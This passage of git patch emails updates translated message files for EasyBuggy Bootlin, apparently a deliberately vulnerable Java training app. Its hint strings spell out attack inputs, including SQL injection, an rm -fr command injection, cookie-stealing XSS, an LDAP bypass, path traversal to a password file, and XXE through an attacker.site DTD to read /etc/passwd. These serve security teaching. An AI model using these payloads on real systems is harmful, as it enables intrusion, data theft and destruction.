example\: capitalize string -> Capitalize String description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. description.design.test=Please click on one of the links below. -description.endless.waiting=When you enter a character count, a batch (including echo characters of the count) is created and executed. +description.endless.waiting=When you enter a character count, a batch file (including echo characters of the count) is created and executed. description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: -description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. +description.parse.json=When you enter a JSON string, a result checked by JSON.parse() of JavaScript is shown. description.performance.issue=Issues for performance description.random.string.generator=When you enter a character count, a random characters of the count is created. -description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. +description.response.time=When you add pingurl\=[a URL] to query string, the response code and time from the url is shown. description.reverse.string=When you enter a string, the reversed string is shown. description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: description.send.mail=You can send a mail to the site administrator. @@ -21,7 +21,7 @@ function.description.brute.force=This login page is vulnerable for brute-force a function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. function.description.code.injection=There is a code injection vulnerability in this page. function.description.csrf=There is a CSRF vulnerability in the change password page. -function.description.dangerous.file.inclusion=An external dangerous file is included in this page. +function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. function.description.dead.lock2=Deadlock (SQL) can occur. @@ -47,9 +47,9 @@ function.description.path.traversal=There is a path traversal vulnerability in t function.description.redirect.loop=Redirect loop occurs if you click this link. function.description.round.off.error=Round off error can occur. function.description.session.fixation=This login page is vulnerable for session fixation attack. -function.description.slow.regular.expression=It takes time to parse the regular expression if you enter a specific string. -function.description.slow.string.plus.operation=It takes time to append strings if you enter a large number. -function.description.slow.unnecessary.object.creation=If you input a large number, it takes time to respond due to unnecessary object creation. +function.description.slow.regular.expression=It takes time to parse a regular expression. +function.description.slow.string.plus.operation=It takes time to append strings. +function.description.slow.unnecessary.object.creation=It takes time to respond due to unnecessary object creation. function.description.sql.injection=There is an SQL injection vulnerability in this page. function.description.thread.leak=Thread leak occurs every time you load this page. function.description.throwable={0} is thrown if you click this link. @@ -167,7 +167,7 @@ label.your.mail=Your Mail Address label.your.name=Your Name msg.account.locked=Your account is locked out because the number of login failures exceeds {0} times. -msg.add.users.by.xml=If you upload an XML file of the following format, users can be registered all at once. +msg.add.users.by.xml=When you upload an XML file of the following format, users can be registered all at once. msg.admin.page.top=Well come to admins page\!\! msg.answer.is.correct=Your answer is correct\! msg.authentication.fail=Authentication failed. Please login again. @@ -190,8 +190,8 @@ msg.enter.json.string=Please enter JSON string. msg.enter.mail=Please enter your mail address. msg.enter.math.expression=Please enter a mathematical expression. You can use java.lang.Math in the expression. For example, Math.sqrt(Math.pow(2, 6)) - 5 msg.enter.name=Please enter your name. -msg.enter.name.and.passwd=If you enter your name and password, then your secret number is shown. -msg.enter.passwd=If you enter a new password and click the submit button, then your password will be changed. +msg.enter.name.and.passwd=When you enter your name and password, your secret number is shown. +msg.enter.passwd=When you enter a new password and click the submit button, your password will be changed. msg.enter.positive.number=Please enter a positive number. msg.enter.string=Please enter a string. msg.error.user.not.exist=User does not exist or password does not match. @@ -214,7 +214,7 @@ msg.note.clickjacking=This page receives a request that a user does not intend a msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. If you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. -msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. +msg.note.createobjects=If you enter a large number, then it takes time to respond due to unnecessary object creation. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. @@ -231,14 +231,14 @@ msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. msg.note.netsocketleak=Network socket leak occurs every time you load this page. msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. -msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. +msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, then you can download a file which includes the content of web.xml. msg.note.open.redirect=You can login with admin and password. If you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. msg.note.roundofferror=Round off error occurs if you enter 1. msg.note.session.fixation=You can login with admin and password. The URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. -msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
 If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. +msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then the parse processing will take several tens of seconds.
 If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. msg.note.sqlijc=You can see a secret number if you enter Mark and password. You can see other users information if you enter password to ' OR '1'\='1 -msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. +msg.note.strplusopr=If you enter a large number, then the processing will take several tens of seconds because the string is created by "+" (plus) operator. msg.note.threadleak=Thread leak occurs every time you load this page. msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. @@ -247,7 +247,7 @@ msg.note.verbose.errror.message=You can login with admin and msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd -msg.note.xxe.step2=and upload the following XML file, you can display the password file (/etc/passwd) on the Linux server. +msg.note.xxe.step2=and upload the following XML file, then you can display the password file (/etc/passwd) on the Linux server. msg.passwd.change.failed=Password change failed. msg.passwd.changed=Your password is successfully changed. msg.passwd.is.too.short=The password must be at least 8 characters. @@ -262,7 +262,7 @@ msg.sent.mail=The mail was sent successfully. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. msg.update.users=You can update users information. -msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. +msg.update.users.by.xml=When you upload an XML file of the following format, users can be updated all at once. msg.user.already.exist=The user already exists. msg.user.not.exist=The user does not exist. msg.valid.json=Valid JSON\! From f3fcf94f8a4603654861e86281c7858bdb67ed9e Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Tue, 13 Nov 2018 15:52:06 +0900 Subject: [PATCH 082/139] New translations messages.properties (Russian) --- src/main/resources/messages_ru.properties | 34 +++++++++++------------ 1 file changed, 17 insertions(+), 17 deletions(-) diff --git a/src/main/resources/messages_ru.properties b/src/main/resources/messages_ru.properties index f059658..60a7783 100644 --- a/src/main/resources/messages_ru.properties +++ b/src/main/resources/messages_ru.properties @@ -1,15 +1,15 @@ #X-Generator: crowdin.com description.access.history=Access history in this page (The latest 15 records). -description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable.The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. +description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable. The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. description.design.test=Please click on one of the links below. -description.endless.waiting=When you enter a character count, a batch (including echo characters of the count) is created and executed. +description.endless.waiting=When you enter a character count, a batch file (including echo characters of the count) is created and executed. description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: -description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. +description.parse.json=When you enter a JSON string, a result checked by JSON.parse() of JavaScript is shown. description.performance.issue=Issues for performance description.random.string.generator=When you enter a character count, a random characters of the count is created. -description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. +description.response.time=When you add pingurl\=[a URL] to query string, the response code and time from the url is shown. description.reverse.string=When you enter a string, the reversed string is shown. description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: description.send.mail=You can send a mail to the site administrator. @@ -21,7 +21,7 @@ function.description.brute.force=This login page is vulnerable for brute-force a function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. function.description.code.injection=There is a code injection vulnerability in this page. function.description.csrf=There is a CSRF vulnerability in the change password page. -function.description.dangerous.file.inclusion=An external dangerous file is included in this page. +function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. function.description.dead.lock2=Deadlock (SQL) can occur. @@ -47,9 +47,9 @@ function.description.path.traversal=There is a path traversal vulnerability in t function.description.redirect.loop=Redirect loop occurs if you click this link. function.description.round.off.error=Round off error can occur. function.description.session.fixation=This login page is vulnerable for session fixation attack. -function.description.slow.regular.expression=It takes time to parse the regular expression if you enter a specific string. -function.description.slow.string.plus.operation=It takes time to append strings if you enter a large number. -function.description.slow.unnecessary.object.creation=If you input a large number, it takes time to respond due to unnecessary object creation. +function.description.slow.regular.expression=It takes time to parse a regular expression. +function.description.slow.string.plus.operation=It takes time to append strings. +function.description.slow.unnecessary.object.creation=It takes time to respond due to unnecessary object creation. function.description.sql.injection=There is an SQL injection vulnerability in this page. function.description.thread.leak=Thread leak occurs every time you load this page. function.description.throwable={0} is thrown if you click this link. @@ -167,7 +167,7 @@ label.your.mail=Your Mail Address label.your.name=Your Name msg.account.locked=Your account is locked out because the number of login failures exceeds {0} times. -msg.add.users.by.xml=If you upload an XML file of the following format, users can be registered all at once. +msg.add.users.by.xml=When you upload an XML file of the following format, users can be registered all at once. msg.admin.page.top=Well come to admins page\!\! msg.answer.is.correct=Your answer is correct\! msg.authentication.fail=Authentication failed. Please login again. @@ -190,8 +190,8 @@ msg.enter.json.string=Please enter JSON string. msg.enter.mail=Please enter your mail address. msg.enter.math.expression=Please enter a mathematical expression. You can use java.lang.Math in the expression. For example, Math.sqrt(Math.pow(2, 6)) - 5 msg.enter.name=Please enter your name. -msg.enter.name.and.passwd=If you enter your name and password, then your secret number is shown. -msg.enter.passwd=If you enter a new password and click the submit button, then your password will be changed. +msg.enter.name.and.passwd=When you enter your name and password, your secret number is shown. +msg.enter.passwd=When you enter a new password and click the submit button, your password will be changed. msg.enter.positive.number=Please enter a positive number. msg.enter.string=Please enter a string. msg.error.user.not.exist=User does not exist or password does not match. @@ -214,7 +214,7 @@ msg.note.clickjacking=This page receives a request that a user does not intend a msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. If you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. -msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. +msg.note.createobjects=If you enter a large number, then it takes time to respond due to unnecessary object creation. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. @@ -231,14 +231,14 @@ msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. msg.note.netsocketleak=Network socket leak occurs every time you load this page. msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. -msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. +msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, then you can download a file which includes the content of web.xml. msg.note.open.redirect=You can login with admin and password. If you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. msg.note.roundofferror=Round off error occurs if you enter 1. msg.note.session.fixation=You can login with admin and password. The URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. -msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
 If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. +msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then the parse processing will take several tens of seconds.
 If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. msg.note.sqlijc=You can see a secret number if you enter Mark and password. You can see other users information if you enter password to ' OR '1'\='1 -msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. +msg.note.strplusopr=If you enter a large number, then the processing will take several tens of seconds because the string is created by "+" (plus) operator. msg.note.threadleak=Thread leak occurs every time you load this page. msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. @@ -247,7 +247,7 @@ msg.note.verbose.errror.message=You can login with admin and msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd -msg.note.xxe.step2=and upload the following XML file, you can display the password file (/etc/passwd) on the Linux server. +msg.note.xxe.step2=and upload the following XML file, then you can display the password file (/etc/passwd) on the Linux server. msg.passwd.change.failed=Password change failed. msg.passwd.changed=Your password is successfully changed. msg.passwd.is.too.short=The password must be at least 8 characters. @@ -262,7 +262,7 @@ msg.sent.mail=The mail was sent successfully. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. msg.update.users=You can update users information. -msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. +msg.update.users.by.xml=When you upload an XML file of the following format, users can be updated all at once. msg.user.already.exist=The user already exists. msg.user.not.exist=The user does not exist. msg.valid.json=Valid JSON\! From 0d7c580a79f22698663b3923cb460f9431790cf9 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Tue, 13 Nov 2018 15:52:09 +0900 Subject: [PATCH 083/139] New translations messages.properties (Spanish) --- src/main/resources/messages_es.properties | 34 +++++++++++------------ 1 file changed, 17 insertions(+), 17 deletions(-) diff --git a/src/main/resources/messages_es.properties b/src/main/resources/messages_es.properties index f059658..60a7783 100644 --- a/src/main/resources/messages_es.properties +++ b/src/main/resources/messages_es.properties @@ -1,15 +1,15 @@ #X-Generator: crowdin.com description.access.history=Access history in this page (The latest 15 records). -description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable.The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. +description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable. The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. description.design.test=Please click on one of the links below. -description.endless.waiting=When you enter a character count, a batch (including echo characters of the count) is created and executed. +description.endless.waiting=When you enter a character count, a batch file (including echo characters of the count) is created and executed. description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: -description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. +description.parse.json=When you enter a JSON string, a result checked by JSON.parse() of JavaScript is shown. description.performance.issue=Issues for performance description.random.string.generator=When you enter a character count, a random characters of the count is created. -description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. +description.response.time=When you add pingurl\=[a URL] to query string, the response code and time from the url is shown. description.reverse.string=When you enter a string, the reversed string is shown. description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: description.send.mail=You can send a mail to the site administrator. @@ -21,7 +21,7 @@ function.description.brute.force=This login page is vulnerable for brute-force a function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. function.description.code.injection=There is a code injection vulnerability in this page. function.description.csrf=There is a CSRF vulnerability in the change password page. -function.description.dangerous.file.inclusion=An external dangerous file is included in this page. +function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. function.description.dead.lock2=Deadlock (SQL) can occur. @@ -47,9 +47,9 @@ function.description.path.traversal=There is a path traversal vulnerability in t function.description.redirect.loop=Redirect loop occurs if you click this link. function.description.round.off.error=Round off error can occur. function.description.session.fixation=This login page is vulnerable for session fixation attack. -function.description.slow.regular.expression=It takes time to parse the regular expression if you enter a specific string. -function.description.slow.string.plus.operation=It takes time to append strings if you enter a large number. -function.description.slow.unnecessary.object.creation=If you input a large number, it takes time to respond due to unnecessary object creation. +function.description.slow.regular.expression=It takes time to parse a regular expression. +function.description.slow.string.plus.operation=It takes time to append strings. +function.description.slow.unnecessary.object.creation=It takes time to respond due to unnecessary object creation. function.description.sql.injection=There is an SQL injection vulnerability in this page. function.description.thread.leak=Thread leak occurs every time you load this page. function.description.throwable={0} is thrown if you click this link. @@ -167,7 +167,7 @@ label.your.mail=Your Mail Address label.your.name=Your Name msg.account.locked=Your account is locked out because the number of login failures exceeds {0} times. -msg.add.users.by.xml=If you upload an XML file of the following format, users can be registered all at once. +msg.add.users.by.xml=When you upload an XML file of the following format, users can be registered all at once. msg.admin.page.top=Well come to admins page\!\! msg.answer.is.correct=Your answer is correct\! msg.authentication.fail=Authentication failed. Please login again. @@ -190,8 +190,8 @@ msg.enter.json.string=Please enter JSON string. msg.enter.mail=Please enter your mail address. msg.enter.math.expression=Please enter a mathematical expression. You can use java.lang.Math in the expression. For example, Math.sqrt(Math.pow(2, 6)) - 5 msg.enter.name=Please enter your name. -msg.enter.name.and.passwd=If you enter your name and password, then your secret number is shown. -msg.enter.passwd=If you enter a new password and click the submit button, then your password will be changed. +msg.enter.name.and.passwd=When you enter your name and password, your secret number is shown. +msg.enter.passwd=When you enter a new password and click the submit button, your password will be changed. msg.enter.positive.number=Please enter a positive number. msg.enter.string=Please enter a string. msg.error.user.not.exist=User does not exist or password does not match. @@ -214,7 +214,7 @@ msg.note.clickjacking=This page receives a request that a user does not intend a msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. If you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. -msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. +msg.note.createobjects=If you enter a large number, then it takes time to respond due to unnecessary object creation. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. @@ -231,14 +231,14 @@ msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. msg.note.netsocketleak=Network socket leak occurs every time you load this page. msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. -msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. +msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, then you can download a file which includes the content of web.xml. msg.note.open.redirect=You can login with admin and password. If you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. msg.note.roundofferror=Round off error occurs if you enter 1. msg.note.session.fixation=You can login with admin and password. The URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. -msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
 If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. +msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then the parse processing will take several tens of seconds.
 If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. msg.note.sqlijc=You can see a secret number if you enter Mark and password. You can see other users information if you enter password to ' OR '1'\='1 -msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. +msg.note.strplusopr=If you enter a large number, then the processing will take several tens of seconds because the string is created by "+" (plus) operator. msg.note.threadleak=Thread leak occurs every time you load this page. msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. @@ -247,7 +247,7 @@ msg.note.verbose.errror.message=You can login with admin and msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd -msg.note.xxe.step2=and upload the following XML file, you can display the password file (/etc/passwd) on the Linux server. +msg.note.xxe.step2=and upload the following XML file, then you can display the password file (/etc/passwd) on the Linux server. msg.passwd.change.failed=Password change failed. msg.passwd.changed=Your password is successfully changed. msg.passwd.is.too.short=The password must be at least 8 characters. @@ -262,7 +262,7 @@ msg.sent.mail=The mail was sent successfully. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. msg.update.users=You can update users information. -msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. +msg.update.users.by.xml=When you upload an XML file of the following format, users can be updated all at once. msg.user.already.exist=The user already exists. msg.user.not.exist=The user does not exist. msg.valid.json=Valid JSON\! From 347a898937f5f262c8ffd1502940e45d23aabe43 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 16 Oct 2019 21:03:31 +0900 Subject: [PATCH 084/139] New translations messages.properties (Chinese Simplified) --- src/main/resources/messages_zh.properties | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/src/main/resources/messages_zh.properties b/src/main/resources/messages_zh.properties index 60a7783..a599c50 100644 --- a/src/main/resources/messages_zh.properties +++ b/src/main/resources/messages_zh.properties @@ -1,4 +1,3 @@ -#X-Generator: crowdin.com description.access.history=Access history in this page (The latest 15 records). description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable. The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String @@ -14,6 +13,7 @@ description.reverse.string=When you enter a string, the reversed string is shown description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: description.send.mail=You can send a mail to the site administrator. description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. +description.thread.dump=Thread dump is as follows. description.troubles=Memory leak, infinite loop, deadlock, and so on\: description.vulnerabilities=XSS, SQL Injection, LDAP injection, and so on\: @@ -33,6 +33,7 @@ function.description.infinite.loop=Infinite loop occurs if you click this link. function.description.int.overflow=Integer overflow can occur. function.description.jvm.crash.eav=JVM crashes if you click this link. function.description.ldap.injection=There is an LDAP injection vulnerability in this page. +function.description.live.lock=Livelock (Java) can occur. function.description.loss.of.trailing.digits=Loss of trailing digits can occur. function.description.mail.header.injection=There is a mail header injection vulnerability in this page. function.description.memory.leak=Memory leak occurs in Java heap space every time you load this page. @@ -76,6 +77,7 @@ function.name.infinite.loop=Infinite Loop function.name.int.overflow=Integer Overflow function.name.jvm.crash.eav=JVM Crash function.name.ldap.injection=LDAP Injection +function.name.live.lock=Livelock (Java) function.name.loss.of.trailing.digits=Loss of Trailing Digits function.name.mail.header.injection=Mail Header Injection function.name.memory.leak=Memory Leak (Java heap space) @@ -224,6 +226,7 @@ msg.note.endlesswaiting=If you enter a large number, then an endless waiting pro msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. msg.note.ldap.injection=You can login with admin and password. You can also bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.livelock=Livelock occurs after continuously loading this page few times. msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. @@ -305,6 +308,7 @@ title.endlesswaiting.page=Execute Batch title.filedescriptorleak.page=Access History title.index.page=EasyBuggy Bootlin title.intoverflow.page=The Distance from Earth to the Moon +title.livelock.page=Thread Dump title.login.page=Login Page for Administrators title.lossoftrailingdigits.page=Decimal Addition title.mailheaderinjection.page=Question to Administrator @@ -327,4 +331,3 @@ title.unrestrictedsizeupload.page=Reverse Color of Image File title.xee.page=Batch Registration of Users title.xss.page=Reverse String title.xxe.page=Batch Update of Users - From 4a80e117636412b02ad7951d50abc162b29e4fe1 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 16 Oct 2019 21:03:33 +0900 Subject: [PATCH 085/139] New translations messages.properties (English) --- src/main/resources/messages_en.properties | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/src/main/resources/messages_en.properties b/src/main/resources/messages_en.properties index 60a7783..a599c50 100644 --- a/src/main/resources/messages_en.properties +++ b/src/main/resources/messages_en.properties @@ -1,4 +1,3 @@ -#X-Generator: crowdin.com description.access.history=Access history in this page (The latest 15 records). description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable. The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String @@ -14,6 +13,7 @@ description.reverse.string=When you enter a string, the reversed string is shown description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: description.send.mail=You can send a mail to the site administrator. description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. +description.thread.dump=Thread dump is as follows. description.troubles=Memory leak, infinite loop, deadlock, and so on\: description.vulnerabilities=XSS, SQL Injection, LDAP injection, and so on\: @@ -33,6 +33,7 @@ function.description.infinite.loop=Infinite loop occurs if you click this link. function.description.int.overflow=Integer overflow can occur. function.description.jvm.crash.eav=JVM crashes if you click this link. function.description.ldap.injection=There is an LDAP injection vulnerability in this page. +function.description.live.lock=Livelock (Java) can occur. function.description.loss.of.trailing.digits=Loss of trailing digits can occur. function.description.mail.header.injection=There is a mail header injection vulnerability in this page. function.description.memory.leak=Memory leak occurs in Java heap space every time you load this page. @@ -76,6 +77,7 @@ function.name.infinite.loop=Infinite Loop function.name.int.overflow=Integer Overflow function.name.jvm.crash.eav=JVM Crash function.name.ldap.injection=LDAP Injection +function.name.live.lock=Livelock (Java) function.name.loss.of.trailing.digits=Loss of Trailing Digits function.name.mail.header.injection=Mail Header Injection function.name.memory.leak=Memory Leak (Java heap space) @@ -224,6 +226,7 @@ msg.note.endlesswaiting=If you enter a large number, then an endless waiting pro msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. msg.note.ldap.injection=You can login with admin and password. You can also bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.livelock=Livelock occurs after continuously loading this page few times. msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. msg.note.memoryleak=Memory leak occurs in 